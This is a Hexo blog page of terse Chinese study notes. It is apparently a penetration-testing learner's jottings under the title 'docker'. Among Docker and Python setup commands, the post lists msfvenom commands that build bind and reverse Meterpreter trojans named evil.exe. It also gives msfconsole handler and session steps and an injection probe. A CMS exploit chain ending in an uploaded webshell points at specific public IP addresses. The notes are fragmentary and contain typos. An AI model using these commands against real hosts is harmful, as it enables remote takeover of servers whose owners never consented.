<!--
	作者：Sariay
	时间：2018-08-26
	描述：There may be a bug, but don't worry, Qiling(器灵) says that it can work normally! aha!
-->
<!DOCTYPE html>
<html class="html-loading">
		

<head>
	<meta charset="utf-8">
  <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
	<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1.0, user-scalable=no">
  <title>
    
      docker | Hexo
    
  </title>
  <meta name="author" content="John Doe">
  <meta name="keywords" content="" />
  <meta name="description" content="" />
	<!-- favicon -->
  <link rel="shortcut icon" href="/img/favicon.ico">

  <!-- css -->
  
<link rel="stylesheet" href="/css/Annie.css">

  
  <!-- jquery -->
	
<script src="/plugin/jquery/jquery.min.js"></script>


<script>
    const CONFIG_BGIMAGE = {
      mode: 'normal',
      normalSrc: '/img/header-bg.jpg',
      randomYouMax: 110,
      randomYouSrc: 'https://sariay.github.io/Random-img/',
	  randomOtherSrc: 'https://api.berryapi.net/?service=App.Bing.Images&day=-0',
	  preloaderEnable: true
    }
	
    const CONFIG_LEACLOUD_COUNT = {
      enable: false,
	  appId: 'AU8...',
	  appKey: '4cU...',
	  serverURLs: 'http' || ' '
    }
  </script>
<meta name="generator" content="Hexo 6.1.0"></head>
	<body>
		<!-- Preloader -->

	<div id="preloader">
		<div class="pre-container">
			
				<div class="spinner">
					<div class="double-bounce1"></div>
					<div class="double-bounce2"></div>
				</div>
						
		</div>
	</div>


<!-- header -->
<header class="fixbackground bg-pan-br">
	<div class="mask">
		<!-- motto -->
		<div class="h-body">	
			
				<div class="motto text-shadow-pop-left">
					<p class="content" id="motto-content">获取中...</p>
					<p>-<p>
					<p class="author" id="motto-author">Just a minute...</p>
				</div>
			
		</div>
		
		<!-- others: such as time... -->			
		<div class="h-footer">
			<a href="javascript:;" id="read-more" class="scroll-down">
				<span class="icon-anchor1 animation-scroll-down"></span>
			</a>
		</div>
	</div>
</header>

<div id="navigation-hide">
	<!-- Progress bar -->
	<div id="progress-bar"></div>

	<!-- Progress percent -->
	<div id="progress-percentage"><span>0.0%</span></div>

	<div class="toc-switch"><span class="switch-button">目录</span></div>

	<!-- Page title -->
	<p>
		
			「docker」
		
	</p>

	
	

	<!-- Nav trigger for navigation-H-->
	<a class="nav-trigger"><span></span></a>
</div>

<!-- Navigation in div(id="navigation-H") -->
<nav class="nav-container" id="cd-nav">
	<div class="nav-header">
		<span class="logo"> 
			<img src="/img/logo.png">
		</span>
		<a href="javascript:;" class="nav-close"></a>
	</div>
	
	<div class="nav-body">
		<ul id="global-nav">
	
		<li class="menu-home">
			<a href="/" class="menu-item-home" target="_blank">主页</a>
		</li>
		
	
		<li class="menu-archive">
			<a href="/archives" class="menu-item-archive" target="_blank">归档</a>
		</li>
		
	
		<li class="menu-categories">
			<a href="/categories" class="menu-item-categories" target="_blank">分类</a>
		</li>
		
	
		<li class="menu-tags">
			<a href="/tags" class="menu-item-tags" target="_blank">标签</a>
		</li>
		
	
		<li class="menu-about">
			<a href="/about" class="menu-item-about" target="_blank">关于</a>
		</li>
		
	
		<li class="menu-gallery">
			<a href="/gallery" class="menu-item-gallery" target="_blank">相册</a>
		</li>
		
	

	
</ul>
	</div>
	
	<div class="nav-footer">
		<ul id="global-social">
	
		<li>
			<a href="http://github.com/" target="_blank">
				<span class="icon-one"><span class="path1"></span><span class="path2"></span></span>
			</a>
		</li>
	
		<li>
			<a href="http://github.com/" target="_blank">
				<span class="icon-zhihu"></span>
			</a>
		</li>
	
		<li>
			<a href="http://github.com/" target="_blank">
				<span class="icon-github"></span>
			</a>
		</li>
	
		<li>
			<a href="http://github.com/" target="_blank">
				<span class="icon-sina-weibo "></span>
			</a>
		</li>
	
		<li>
			<a href="http://github.com/" target="_blank">
				<span class="icon-pinterest2"></span>
			</a>
		</li>
	
		<li>
			<a href="http://github.com/" target="_blank">
				<span class="icon-instagram"></span>
			</a>
		</li>
	
		<li>
			<a href="http://github.com/" target="_blank">
				<span class="icon-twitter"></span>
			</a>
		</li>
	
		<li>
			<a href="/atom.xml" target="_blank">
				<span class="icon-rss"></span>
			</a>
		</li>
			
</ul>

	</div>
</nav>
			
		<!--main-->
		<main>
			<!--
	时间：2018-11-17
	描述：
		插件名称：katelog.min.js
		插件作者：KELEN
		插件来源: https://github.com/KELEN/katelog
-->
	 

<div class="layout-post">
	<div id="layout-post">
		<div class="article-title">
			
	<a href="/2022/06/04/docker/" itemprop="url">
		docker
	</a>

		</div>

		<div class="article-meta">
			<span>
				<i class="icon-calendar1"></i>
				
				




	更新于

	<a href="/2022/06/04/docker/" itemprop="url">
		<time datetime="2022-06-04T14:00:12.946Z" itemprop="dateUpdated">
	  		2022-06-04
	  </time>
	</a> 



			</span>
			<span>
						
			</span>
			
			



		</div>

		<div class="article-content" id="article-content">
			<p>date: 2022-06-04 22:00:12<br>tags:</p>
<hr>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line">/etc/init.d/docker restart</span><br><span class="line"></span><br><span class="line">docker info </span><br><span class="line"></span><br><span class="line"></span><br><span class="line">/etc/init.d/docker restart</span><br><span class="line"></span><br><span class="line">docker info </span><br><span class="line">docker search nessus</span><br><span class="line">docker pull 镜像名称</span><br><span class="line">docker images</span><br><span class="line">docker run --rm -itd -p 8834:8834 nessus</span><br><span class="line"></span><br><span class="line">admin</span><br><span class="line">123.com</span><br><span class="line"></span><br><span class="line">https://127.0.0.1:8834</span><br><span class="line"></span><br><span class="line">sql   id=1&#x27;</span><br><span class="line"></span><br><span class="line">git clone https://github.com/0xs1riu5/vulawdhub</span><br><span class="line">cd vulawdhub/HDwiki/5.1</span><br><span class="line">docker-compose up -d </span><br><span class="line">docker ps</span><br></pre></td></tr></table></figure>
<hr>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br><span class="line">125</span><br><span class="line">126</span><br><span class="line">127</span><br><span class="line">128</span><br><span class="line">129</span><br><span class="line">130</span><br><span class="line">131</span><br><span class="line">132</span><br><span class="line">133</span><br><span class="line">134</span><br></pre></td><td class="code"><pre><span class="line">docker安装方式：</span><br><span class="line">curl -s https://get.docker.com/ | sh </span><br><span class="line">sudo apt install docker.io</span><br><span class="line"></span><br><span class="line">pip的安装方式：</span><br><span class="line">curl -s https://bootstrap.pypa.io/get-pip.py | python3</span><br><span class="line"></span><br><span class="line">pip安装docker-compose</span><br><span class="line">pip install docker-compose</span><br><span class="line"></span><br><span class="line">https://mirrors.aliyun.com/pypi/si</span><br><span class="line"></span><br><span class="line">pip search 模块名称 -i  https://mirrors.aliyun.com/pypi/simple/</span><br><span class="line"></span><br><span class="line">pip install 模块名称  -i   https://mirrors.aliyun.com/pypi/simple/</span><br><span class="line"></span><br><span class="line">进入到有docker-compose.yml的目录下：执行如下命令：</span><br><span class="line">docker-compose build </span><br><span class="line">或者</span><br><span class="line">docker-compose up -d</span><br><span class="line"></span><br><span class="line">docker ps 查看运行的docker容器</span><br><span class="line"></span><br><span class="line">进入到有docker-compose.yml的目录下,来关闭docker</span><br><span class="line">docker-compose down</span><br><span class="line"></span><br><span class="line">xv</span><br><span class="line"></span><br><span class="line">linux手动安装python:</span><br><span class="line">wget https://www.python.com/10.8/python.tar.gz</span><br><span class="line">tar -zcvf python.tar.gz</span><br><span class="line">cd python</span><br><span class="line">./configure --prefix=/usr/local/python10.8/</span><br><span class="line">make&amp;&amp;make install </span><br><span class="line">cd ~</span><br><span class="line">vim .bashrc</span><br><span class="line">最后添加：PATH=$PATH:/usr/local/python10.8/bin</span><br><span class="line">source ~/.bashrc </span><br><span class="line"></span><br><span class="line">python -V</span><br><span class="line"></span><br><span class="line">ln -s /usr/bin/python10 /usr/local/python10.8/bin/python</span><br><span class="line"></span><br><span class="line">ln -s /usr/bin/python10 /usr/local/python10.8/bin/python</span><br><span class="line"></span><br><span class="line">http://180.153.183.97/siteserver/main.aspx?module=cms</span><br><span class="line"></span><br><span class="line">http://180.153.183.97/sitefiles/sitetemplates/cream/webshell.asp</span><br><span class="line"></span><br><span class="line">sitecms</span><br><span class="line"> 密码找回--》模块管理--》上传webshell--》控制目标服务器</span><br><span class="line"></span><br><span class="line">利用链</span><br><span class="line"></span><br><span class="line">http://101.43.167.24:8002/</span><br><span class="line"></span><br><span class="line">wolai 语雀</span><br><span class="line"></span><br><span class="line">msfconsole 进入到MSF的交互式终端</span><br><span class="line">msfvenom 生成病毒</span><br><span class="line"></span><br><span class="line">msfvenom -p windows/meterpreter/bind_tcp  LPORT=8888 -f exe -o evil.exe</span><br><span class="line"></span><br><span class="line">-p payload  控制目标服务器之后干的事</span><br><span class="line">LPORT=8888  监听的端口</span><br><span class="line">-f 木马文件类型</span><br><span class="line">-o 输出</span><br><span class="line">windows/meterpreter/bind_tcp</span><br><span class="line">meterpreter 一种shell的名称</span><br><span class="line">bind_tcp 在本地监听端口</span><br><span class="line"></span><br><span class="line">这句话：生成exe木马病毒，木马运行之后，在目前服务器中开启8888端口，等待攻击者去连接（x32）</span><br><span class="line"></span><br><span class="line">msfvenom -p windows/x64/meterpreter/bind_tcp  LPORT=8888 -f exe -o evil.exe (x64)</span><br><span class="line"></span><br><span class="line">需要你主动去连接，那就意味着你可以访问目标服务器</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.10.103 LPORT=1234 -f exe -o evil.exe</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">LHOST=192.168.10.103 连接的IP</span><br><span class="line">windows/x64/meterpreter/reverse_tcp反向去连接设置的主机的1234端口</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">使用上面的命令生成的木马 在运行之后主动找攻击者192.168.10.103，在该主机中找到1234端口，去连接过去</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">内网IP无法在公网中传输</span><br><span class="line"></span><br><span class="line">kali先开postgreql数据库</span><br><span class="line">/etc/init.d/postgreql start</span><br><span class="line">systemctl  start postgreql</span><br><span class="line"></span><br><span class="line">msfvenom去生成木马，上传木马到目标服务器，运行起来</span><br><span class="line"></span><br><span class="line">msfconsole</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">handler -p windows/x64/meterpreter/bind_tcp -H 180.153.183.97 -P 8888</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">kali先开postgreql数据库</span><br><span class="line">/etc/init.d/postgreql start</span><br><span class="line">systemctl  start postgreql</span><br><span class="line"></span><br><span class="line">msfvenom去生成木马，上传木马到目标服务器，运行起来</span><br><span class="line"></span><br><span class="line">msfconsole</span><br><span class="line"></span><br><span class="line">andler -p windows/x64/meterpreter/bind_tcp -H 180.153.183.97 -P 8888</span><br><span class="line"></span><br><span class="line">会自动获取一个会话：session</span><br><span class="line"></span><br><span class="line">session 1 </span><br><span class="line">会进入到目标主机的回话</span><br><span class="line"></span><br><span class="line">getuid</span><br><span class="line">sysinfo</span><br><span class="line">shell 进入终端</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">msfvenom -p windows/x64/meterpreter/bind_tcp  LPORT=8888 -f exe -o evil.exe</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">不需要设置IP</span><br><span class="line"></span><br><span class="line">在目标服务器中开端口 8888</span><br><span class="line"></span><br><span class="line">https://www.wolai.com/4cwRfFaoNMMfUNGZXtSEX6</span><br></pre></td></tr></table></figure>	
		</div>
		
		<div id="current-post-cover" data-scr="/img/cart_cover.jpg"></div>

		<!-- relate post, comment...-->
		<div class="investment-container">
			<div class="investment-header">
				<div class="investment-title-1">
					<div class="on">相关文章</div>
					<div>评论</div>
					<div>分享</div>
				</div>
				<div class="investment-title-2">	            
					
	<span>
		<a id="totop-post-page">返回顶部</a>
		
		
			<a href="/2022/06/03/%E7%AB%AF%E5%8F%A3%E6%89%AB%E6%8F%8F%E6%9C%8D%E5%8A%A1/" title="端口扫描服务" rel="next">
				下一篇&raquo;
			</a>
			
	</span>


      		
				</div>	
			</div>
			
			<div class="investment-content">
				<div class="investment-content-list">
					

<div class="relate-post">
	
		<ul>
			
					<li>
						<div class="relate-post-text">
							<a class="relate-post-title" href="/2022/06/03/%E7%AB%AF%E5%8F%A3%E6%89%AB%E6%8F%8F%E6%9C%8D%E5%8A%A1/" title="端口扫描服务">
								端口扫描服务			
							</a>
							<p class="relate-post-date">
								<i class="fa fa-calendar"></i>
								六月 3日, 2022				
							</p>
							<p class="relate-post-content">
								date: 2022-06-03 08:40:06tags:

1234567891011121314151617181920212223242526272829303132333435363738394041424344454647...
							</p>
						</div>

						<div class="relate-post-cover">
							<a href="/2022/06/03/%E7%AB%AF%E5%8F%A3%E6%89%AB%E6%8F%8F%E6%9C%8D%E5%8A%A1/" title="端口扫描服务">				
								
								<img class="lazy" src="/img/lazy.gif" data-src="/img/cart_cover.jpg" alt="端口扫描服务"/>
							</a>
						</div>
					</li>												
			
					<li>
						<div class="relate-post-text">
							<a class="relate-post-title" href="/2022/05/14/%E5%B8%83%E5%B0%94,%E6%97%B6%E9%97%B4%E7%9B%B2%E6%B3%A8%EF%BC%8C%E5%AE%BD%E5%AD%97%E8%8A%82%EF%BC%8C%E4%BA%8C%E6%AC%A1%E7%BC%96%E7%A0%81%EF%BC%8C%E5%A0%86%E5%8F%A0%E6%B3%A8%E5%85%A5%EF%BC%8CSQLmap%EF%BC%8CMSSql%EF%BC%8C%E8%BF%87WAF/" title="布尔，时间盲注，宽字节，二次编码，堆叠注入，SQLmap，MSSql，过WAF">
								布尔，时间盲注，宽字节，二次编码，堆叠注入，SQLmap，MSSql，过WAF			
							</a>
							<p class="relate-post-date">
								<i class="fa fa-calendar"></i>
								五月 14日, 2022				
							</p>
							<p class="relate-post-content">
								date: 2022-05-14 16:15:08tags:












































补充https://habaijian.com/https://www.w3scho...
							</p>
						</div>

						<div class="relate-post-cover">
							<a href="/2022/05/14/%E5%B8%83%E5%B0%94,%E6%97%B6%E9%97%B4%E7%9B%B2%E6%B3%A8%EF%BC%8C%E5%AE%BD%E5%AD%97%E8%8A%82%EF%BC%8C%E4%BA%8C%E6%AC%A1%E7%BC%96%E7%A0%81%EF%BC%8C%E5%A0%86%E5%8F%A0%E6%B3%A8%E5%85%A5%EF%BC%8CSQLmap%EF%BC%8CMSSql%EF%BC%8C%E8%BF%87WAF/" title="布尔，时间盲注，宽字节，二次编码，堆叠注入，SQLmap，MSSql，过WAF">				
								
								<img class="lazy" src="/img/lazy.gif" data-src="/img/cart_cover.jpg" alt="布尔，时间盲注，宽字节，二次编码，堆叠注入，SQLmap，MSSql，过WAF"/>
							</a>
						</div>
					</li>												
			
					<li>
						<div class="relate-post-text">
							<a class="relate-post-title" href="/2022/05/06/CSRF-XML-XXE-SSRF-%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E/" title="CSRF,XML,XXE,SSRF,命令执行漏洞">
								CSRF,XML,XXE,SSRF,命令执行漏洞			
							</a>
							<p class="relate-post-date">
								<i class="fa fa-calendar"></i>
								五月 6日, 2022				
							</p>
							<p class="relate-post-content">
								date: 2022-05-06 14:55:26tags:


























12345678910111213141516171819202122232425262728293031读取源码php...
							</p>
						</div>

						<div class="relate-post-cover">
							<a href="/2022/05/06/CSRF-XML-XXE-SSRF-%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E/" title="CSRF,XML,XXE,SSRF,命令执行漏洞">				
								
								<img class="lazy" src="/img/lazy.gif" data-src="/img/cart_cover.jpg" alt="CSRF,XML,XXE,SSRF,命令执行漏洞"/>
							</a>
						</div>
					</li>												
			
					<li>
						<div class="relate-post-text">
							<a class="relate-post-title" href="/2022/05/04/Burp%E3%80%81Sql%E6%B3%A8%E5%85%A5%EF%BC%8C%E8%81%94%E5%90%88%E6%B3%A8%E5%85%A5%EF%BC%8C%E6%8A%A5%E9%94%99%E6%B3%A8%E5%85%A5/" title="Burp、Sql注入，联合注入，报错注入">
								Burp、Sql注入，联合注入，报错注入			
							</a>
							<p class="relate-post-date">
								<i class="fa fa-calendar"></i>
								五月 4日, 2022				
							</p>
							<p class="relate-post-content">
								date: 2022-05-04 11:37:35tags:






















注：group_concat( [DISTINCT] 要连接的字段 [Order BY 排序字段 ASC&#x2F;DESC] ...
							</p>
						</div>

						<div class="relate-post-cover">
							<a href="/2022/05/04/Burp%E3%80%81Sql%E6%B3%A8%E5%85%A5%EF%BC%8C%E8%81%94%E5%90%88%E6%B3%A8%E5%85%A5%EF%BC%8C%E6%8A%A5%E9%94%99%E6%B3%A8%E5%85%A5/" title="Burp、Sql注入，联合注入，报错注入">				
								
								<img class="lazy" src="/img/lazy.gif" data-src="/img/cart_cover.jpg" alt="Burp、Sql注入，联合注入，报错注入"/>
							</a>
						</div>
					</li>												
			
					<li>
						<div class="relate-post-text">
							<a class="relate-post-title" href="/2022/05/04/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E3%80%81%E5%8C%85%E5%90%AB%E3%80%81XSS/" title="文件上传、包含、XSS">
								文件上传、包含、XSS			
							</a>
							<p class="relate-post-date">
								<i class="fa fa-calendar"></i>
								五月 4日, 2022				
							</p>
							<p class="relate-post-content">
								date: 2022-05-04 10:14:49tags:





































补充https://github.com/Ascotbe/Medusahttps://github...
							</p>
						</div>

						<div class="relate-post-cover">
							<a href="/2022/05/04/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E3%80%81%E5%8C%85%E5%90%AB%E3%80%81XSS/" title="文件上传、包含、XSS">				
								
								<img class="lazy" src="/img/lazy.gif" data-src="/img/cart_cover.jpg" alt="文件上传、包含、XSS"/>
							</a>
						</div>
					</li>												
			
					<li>
						<div class="relate-post-text">
							<a class="relate-post-title" href="/2022/04/27/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0,%E5%8C%85%E5%90%AB/" title="文件上传,包含">
								文件上传,包含			
							</a>
							<p class="relate-post-date">
								<i class="fa fa-calendar"></i>
								四月 27日, 2022				
							</p>
							<p class="relate-post-content">
								date: 2022-04-27 11:14:32tags:



文件上传
原理：

补充

webshell分类

    一句话木马：代码量小，需要和webshell管理工具配合使用；    
        php:&lt;?...
							</p>
						</div>

						<div class="relate-post-cover">
							<a href="/2022/04/27/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0,%E5%8C%85%E5%90%AB/" title="文件上传,包含">				
								
								<img class="lazy" src="/img/lazy.gif" data-src="/img/cart_cover.jpg" alt="文件上传,包含"/>
							</a>
						</div>
					</li>												
			
					<li>
						<div class="relate-post-text">
							<a class="relate-post-title" href="/2022/04/07/php-cookies-session-MySQL/" title="php,cookies,session,MySQL">
								php,cookies,session,MySQL			
							</a>
							<p class="relate-post-date">
								<i class="fa fa-calendar"></i>
								四月 7日, 2022				
							</p>
							<p class="relate-post-content">
								date: 2022-04-07 21:31:30tags:








































							</p>
						</div>

						<div class="relate-post-cover">
							<a href="/2022/04/07/php-cookies-session-MySQL/" title="php,cookies,session,MySQL">				
								
								<img class="lazy" src="/img/lazy.gif" data-src="/img/cart_cover.jpg" alt="php,cookies,session,MySQL"/>
							</a>
						</div>
					</li>												
			
					<li>
						<div class="relate-post-text">
							<a class="relate-post-title" href="/2022/03/25/sqli-labs-1-3/" title="sqli-labs前1-3关">
								sqli-labs前1-3关			
							</a>
							<p class="relate-post-date">
								<i class="fa fa-calendar"></i>
								三月 25日, 2022				
							</p>
							<p class="relate-post-content">
								date: 2022-03-25 14:53:38tags:

###第一关

根据页面提示需要加入一个数字参数，直接加入?id&#x3D;1

输入and 1&#x3D;1 来进行判断，显示正常

直接输入单引号看是否会提示报错

...
							</p>
						</div>

						<div class="relate-post-cover">
							<a href="/2022/03/25/sqli-labs-1-3/" title="sqli-labs前1-3关">				
								
								<img class="lazy" src="/img/lazy.gif" data-src="/img/cart_cover.jpg" alt="sqli-labs前1-3关"/>
							</a>
						</div>
					</li>												
			
					<li>
						<div class="relate-post-text">
							<a class="relate-post-title" href="/2022/03/14/my-first-blog/" title="my-first-blog">
								my-first-blog			
							</a>
							<p class="relate-post-date">
								<i class="fa fa-calendar"></i>
								三月 14日, 2022				
							</p>
							<p class="relate-post-content">
								date: 2022-03-14 00:21:38tags:

 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 ...
							</p>
						</div>

						<div class="relate-post-cover">
							<a href="/2022/03/14/my-first-blog/" title="my-first-blog">				
								
								<img class="lazy" src="/img/lazy.gif" data-src="/img/cart_cover.jpg" alt="my-first-blog"/>
							</a>
						</div>
					</li>												
			
					<li>
						<div class="relate-post-text">
							<a class="relate-post-title" href="/2022/03/13/hello-world/" title="Hello World">
								Hello World			
							</a>
							<p class="relate-post-date">
								<i class="fa fa-calendar"></i>
								三月 13日, 2022				
							</p>
							<p class="relate-post-content">
								Welcome to Hexo! This is your very first post. Check documentation for more info. If you get any problems when using ...
							</p>
						</div>

						<div class="relate-post-cover">
							<a href="/2022/03/13/hello-world/" title="Hello World">				
								
								<img class="lazy" src="/img/lazy.gif" data-src="/img/cart_cover.jpg" alt="Hello World"/>
							</a>
						</div>
					</li>												
			
		</ul>
	
</div>	
				</div>
				<div class="investment-content-list">
					<div class="layout-comment">

	
		<div class="config-info">
			Please check the parameter of <b>comment</b> in config.yml of hexo-theme-Annie!
		</div>	
	

</div>
				</div>
				<div class="investment-content-list">
					<div class="layout-share">
	
	

		
			
			<!-- socialShare share -->
			<div class="social-share"></div>

<!--  css & js -->
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/social-share.js/1.0.16/css/share.min.css">
<script async src="https://cdnjs.cloudflare.com/ajax/libs/social-share.js/1.0.16/js/social-share.min.js"></script>
			
		
		
	
</div>


				</div>
			</div>	
		</div>
	</div>
</div>

<!-- show math formula -->



	 
	
<script src="/plugin/clipboard/clipboard.js"></script>

	<script>
		// Copy code !
	    function preprocessing() {
	        $("#article-content .highlight").each(function() {
	            $(this).wrap('<div id="post-code"></div>');
	        })

	        $("#article-content #post-code").each(function() {
	            $(this).prepend('<nav class="copy-nav"><span><i class="code-language"></i></span></nav>');
	        })

	        $("#article-content .copy-nav").each(function() {
	            let languageClass = $(this).next().attr('class'),
	                language = ((languageClass.length > 9) && (languageClass != null)) ? languageClass.substr(10) : "none"; //why 9? Need to check language?

	            $(this).find('.code-language').text(language);
	            $(this).append('<span class="copy-btn icon-paste"></span>');
	        });
	    }

		function copy() {
		    $('#article-content #post-code').each(function(i) {
		        let codeCopyId = 'codeCopy-' + i;

		        let codeNode = $(this).find('.code'),
		            copyButton = $(this).find('.copy-btn');

		        codeNode.attr('id', codeCopyId);
		        copyButton.attr('data-clipboard-target-id', codeCopyId);
		    })
   
			let clipboard = new ClipboardJS('.copy-btn', {
					target: function(trigger) {
						return document.getElementById(trigger.getAttribute('data-clipboard-target-id'));
					}
		      	});

			//pure js
			function showTooltip(elem, msg) {		   
				elem.setAttribute('aria-label', msg);
				elem.setAttribute('class', 'copy-btn icon-clipboard1');
				setTimeout(function() {
					elem.setAttribute('class', 'copy-btn icon-paste');
				}, 2000);
			}

			clipboard.on('success', function(e) {
			    e.clearSelection();
			    console.info('Action:', e.action);		   
			    console.info('Trigger:', e.trigger);
			    showTooltip(e.trigger, 'Copied!');   
			});
			
			clipboard.on('error', function(e) {
			    console.error('Action:', e.action);
			    console.error('Trigger:', e.trigger);
			});
		}
		
		(function copyCode(){
			if ($('.layout-post').length) {
			    preprocessing();
			    copy();
			} 
		})();
	</script>






<link rel="stylesheet" href="/plugin/fancybox/jquery.fancybox.css">


<script src="/plugin/fancybox/jquery.fancybox.js"></script>


<script type="text/javascript">
	(function gallerySet(){
		let titleID = $('.article-title a'),
			imageID = $('.article-content img'),
			videoID = $('.article-content video');
		
		let postTitle = titleID.text() ? titleID.text() : "No post title!";
		
		imageID.each(function() {
			let imgPath = $(this).attr('src'),
				imgTitle = $(this).attr('alt') ? $(this).attr('alt') : "No image description!";
		
			//给每个匹配的<img>元素打包, 即添加父元素<a>
			$(this).wrap('<a data-fancybox="gallery" data-caption="《 ' + postTitle + ' 》' + imgTitle + '"href="' + imgPath + '"> </a>');
		});
		
		videoID.each(function() {
			let videoPath = $(this).attr('src');
		
			//给每个匹配的<img>元素打包, 即添加父元素<a>
			$(this).wrap('<a data-fancybox href=" ' + videoPath + ' "> </a>');
		});
		
		//TODO：支持html5 video

		if($('#layout-post').length) {
			$('[data-fancybox="gallery"]').fancybox({
				loop: true,
				buttons: [
					"zoom",
					"share",
					"slideShow",
					"fullScreen",
					//"download",
					"thumbs",
					"close"
				],
				protect: true
			});
		}
	})();
</script>
		</main>

		<!--footer-->
		<footer>
	<div id="navigation-show">
		<ul id="global-nav">
	
		<li class="menu-home">
			<a href="/" class="menu-item-home" target="_blank">主页</a>
		</li>
		
	
		<li class="menu-archive">
			<a href="/archives" class="menu-item-archive" target="_blank">归档</a>
		</li>
		
	
		<li class="menu-categories">
			<a href="/categories" class="menu-item-categories" target="_blank">分类</a>
		</li>
		
	
		<li class="menu-tags">
			<a href="/tags" class="menu-item-tags" target="_blank">标签</a>
		</li>
		
	
		<li class="menu-about">
			<a href="/about" class="menu-item-about" target="_blank">关于</a>
		</li>
		
	
		<li class="menu-gallery">
			<a href="/gallery" class="menu-item-gallery" target="_blank">相册</a>
		</li>
		
	

	
</ul>
	</div>

	<div class="copyright">
		<p>
			 
				&copy;2017 - 2022, content by Sariay. All Rights Reserved.
			
			
				<a href="http://hexo.io/" title="Hexo" target="_blank" rel="noopener">Hexo</a> Theme <a href="https://github.com/Sariay/hexo-theme-Annie" title="Annie" target="_blank" rel="noopener">Annie</a> by Sariay.
			
		</p>
		<p>
			

	<!-- busuanzi -->
	<!-- busuanzi -->



			<a href="javascript:zh_tran('s');" class="zh_click" id="zh_click_s">简体</a> 
			<a href="javascript:zh_tran('t');" class="zh_click" id="zh_click_t">繁體</a>				
		</p>
	</div>		
</footer>
		
	<!-- Local or hitokoto! -->

	
<script src="/plugin/motto/motto.js"></script>

	
	<script type="text/javascript">
		(function motto(){
			let mottoText = getMingYanContent().split('</br> - </br>'),
			
			mottoTextContent = mottoText[0]?mottoText[0]:'请刷新...',
			
			mottoTextFrom = mottoText[1]?mottoText[1]:'one/一个';
			
			mottoTextContent = mottoTextContent.trim().substring(0, 100);
		
			$("#motto-content").html( mottoTextContent);
